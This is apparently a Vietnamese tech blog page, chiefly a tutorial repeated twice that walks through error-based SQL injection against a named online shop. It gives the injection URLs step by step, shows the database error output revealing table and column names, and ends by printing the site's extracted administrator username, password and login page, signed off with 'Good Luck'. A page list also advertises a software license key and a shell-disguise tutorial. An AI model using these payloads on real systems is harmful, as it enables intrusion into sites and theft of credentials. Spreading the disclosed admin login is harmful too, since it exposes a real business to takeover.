Lỗi bug trong Gmail Android cho phép bất cứ ai cũng có thể gửi email giả mạo
15 bức ảnh khoa học tuyệt đẹp trong năm 2015
Tổng hợp game mobile đua xe đáng chơi nhất 2015
Key bản quyền Sublime Text 3 (2015-2016)
Lenovo nói gì về sự cố máy tính cài sẵn phần mềm gián điệp?
Top 10 ngôn ngữ lập trình dễ bị Hack
Nguyễn Hà Đông giải thích lý do game mới Swing Copters 2 'từ chối' người Việt
Mark Zuckerberg học theo Iron Man: phát triển trợ lý ảo như 'Jarvis'
Tut Tấn công ASPX qua SQLi
Victim: http://www.hienshop.vn/
--------------------------------------------------
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables))/Default.aspx
Conversion failed when converting the nvarchar value 'tblCategory' to data type int.
=>> tblCategory
---------------------------------------------------
Có được "tblCategory" ta thay tiếp vào để lấy table tiếp theo
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory')))/Default.aspx
Conversion failed when converting the nvarchar value 'tblComment' to data type int.
=>> tblComment
-------------------------------------------------
Có được "tblComment" ta lại thay vào tiếp như thế này
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment')))/Default.aspx
=>> Ta có "tblfooter"
-------------------------------------------------
Và ta thay tương tự như trên ta có
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment', 'tblfooter', 'tbllienhe', 'tblLogo', 'tblNews', 'tblOrder', 'tblOrderDetail')))/Default.aspx
=>> Vâng thông báo rất mất dạy, đéo được quá 260 từ. Thế thì sao, dùng kinh nghiệm đoán Table "thần chưởng". Tui thì đoán cmn đại là tblAdmin.
Và
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))/Default.aspx
CLGT này =>> AdminID
----------------------------------------------
Tới bước lấy thông tin User rồi:
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))//Default.aspx
=>> dnlong
Thay chổ "UserName" thành "PassWord"
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx
=>> Vẫn là dnlong
----------------------------------------------
Login Admin:
http://www.hienshop.vn/admin/Login.aspx
ID: dnlong
Pass: dnlong
Checked By Anh Hai Sài Gòn, Good Luck
Victim: http://www.hienshop.vn/
--------------------------------------------------
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables))/Default.aspx
Conversion failed when converting the nvarchar value 'tblCategory' to data type int.
=>> tblCategory
---------------------------------------------------
Có được "tblCategory" ta thay tiếp vào để lấy table tiếp theo
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory')))/Default.aspx
Conversion failed when converting the nvarchar value 'tblComment' to data type int.
=>> tblComment
-------------------------------------------------
Có được "tblComment" ta lại thay vào tiếp như thế này
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment')))/Default.aspx
=>> Ta có "tblfooter"
-------------------------------------------------
Và ta thay tương tự như trên ta có
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment', 'tblfooter', 'tbllienhe', 'tblLogo', 'tblNews', 'tblOrder', 'tblOrderDetail')))/Default.aspx
=>> Vâng thông báo rất mất dạy, đéo được quá 260 từ. Thế thì sao, dùng kinh nghiệm đoán Table "thần chưởng". Tui thì đoán cmn đại là tblAdmin.
Và
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))/Default.aspx
CLGT này =>> AdminID
----------------------------------------------
Tới bước lấy thông tin User rồi:
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))//Default.aspx
=>> dnlong
Thay chổ "UserName" thành "PassWord"
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx
=>> Vẫn là dnlong
----------------------------------------------
Login Admin:
http://www.hienshop.vn/admin/Login.aspx
ID: dnlong
Pass: dnlong
Checked By Anh Hai Sài Gòn, Good Luck
![[Tut] Ngụy Trang Shell](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhhp0pTbsWYd_N8r0MY9rBpi-6fkspQPtWNCM_4W_h256Em3Dl1ajKc33yLGxGHR_rvItb9_v2stWLQq6XAaCEbBfY5AekGNtPJ54idSQD623FudR3i2AcYfSC7eQdnZqSbQBTv56Mm-8/w375-h250-c/not.PNG)
0 comments so far,add yours
Cám ơn đã ghé thăm BlogCNTT!
- Mọi thắc mắc, gợi ý hoặc bình luận xin chia sẻ bên dưới hoặc Liên Hệ
- Hãy viết bằng tiếng Việt có dấu để mọi người dễ đọc hơn!
Thank You!